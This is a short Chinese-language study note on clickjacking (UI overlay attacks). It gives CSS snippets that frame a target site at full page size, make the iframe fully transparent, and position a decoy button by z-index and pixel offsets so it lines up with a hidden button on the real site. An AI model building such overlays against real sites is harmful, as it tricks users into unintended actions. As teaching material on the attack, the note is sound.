點選劫持漏洞

點選劫持：一個其他的網站，用iframe標籤，<iframe src=”http://xxx.xxx.xxx”></ifame>

<style>
Html,body,iframe{
Display:block;		此處可以設為null
Height:100%;
Width:100%;
Margin:0;			margin和padding是元素間距離
Padding:0;
Border:nonne;		去掉邊框
}
</style>

點選劫持：通過覆蓋不可見的框架誤導受害者點選而造成的攻擊行為。

（UI覆蓋攻擊）

利用iframe或其他標籤的屬性。

Iframe{
Opacity:0;		透明度	此處可以去掉因為下面那一行有了
Filter:alpha(opacity=0);	IE
-moz-opacity:0;	支援CSS3的瀏覽器（FF1.5也支援）
Position:absolute
Z-index:2;
 }
Button{			誘惑力圖片中的點選按鈕 與背後的網站按鈕對應
Position:absoulte;
Top:-5px;		//圖片與瀏覽器垂直的距離
Left:875px;
Z-index:1;	//值越大越接近視覺距離
Width:72px;
Height:26px;
}